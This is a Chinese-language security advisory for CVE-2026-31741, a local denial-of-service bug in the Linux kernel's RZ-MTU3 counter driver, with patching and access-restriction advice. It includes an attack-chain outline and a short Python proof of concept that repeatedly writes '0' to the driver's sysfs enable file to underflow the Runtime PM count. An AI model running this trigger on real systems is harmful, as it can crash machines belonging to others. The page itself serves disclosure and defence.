CVE-2026-31741 CVSS 5.5 中危

CVE-2026-31741 Linux内核RZ-MTU3计数器拒绝服务漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31741

漏洞类型

拒绝服务

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的Renesas RZ/G2L MTU3计数器驱动存在逻辑漏洞。攻击者可通过反复向sysfs enable文件写入数据，导致Runtime PM使用计数下溢或上溢。这会在时钟关闭时错误访问硬件寄存器，引发内核报错或系统不稳定，从而导致拒绝服务。

技术细节

该漏洞源于drivers/counter/rz-mtu3-cnt.c驱动中未对sysfs enable文件的写入操作进行状态校验。当用户多次写入0时，Runtime PM usage count发生下溢，并在时钟关闭状态下调用rz_mtu3_terminate_counter()访问硬件寄存器，导致内核报错。多次写入1则导致计数器持续递增，产生资源泄漏。此外，在PWM运行时写入0会错误停止PWM。本地低权限攻击者可利用此缺陷触发内核异常。

攻击链分析

STEP 1

攻击者获取本地低权限用户访问权限。

STEP 2

定位到系统中rz-mtu3计数器驱动的sysfs enable接口文件。

STEP 3

重复向该文件写入'0'，触发Runtime PM计数下溢。

STEP 4

内核尝试在时钟关闭时访问硬件寄存器，导致系统报错或崩溃。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-31741: Trigger Runtime PM underflow
# Requires hardware with rz-mtu3-counter driver loaded
import os

SYSFS_PATH = "/sys/bus/counter/devices/rz-mtu3-counter.0/enable"

def trigger_underflow():
    if not os.path.exists(SYSFS_PATH):
        print("Target sysfs file not found.")
        return

    try:
        # Write '0' multiple times to trigger underflow
        for _ in range(5):
            with open(SYSFS_PATH, 'w') as f:
                f.write('0')
        print("Triggered writes. Check dmesg for underflow messages.")
    except IOError as e:
        print(f"Failed to write to sysfs: {e}")

if __name__ == "__main__":
    trigger_underflow()

影响范围

Linux Kernel (未应用补丁的版本)

防御指南

临时缓解措施

建议尽快应用Linux内核官方提供的补丁程序，修复Runtime PM使用计数的校验逻辑。在无法立即升级的情况下，应严格限制对相关sysfs接口的访问权限。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表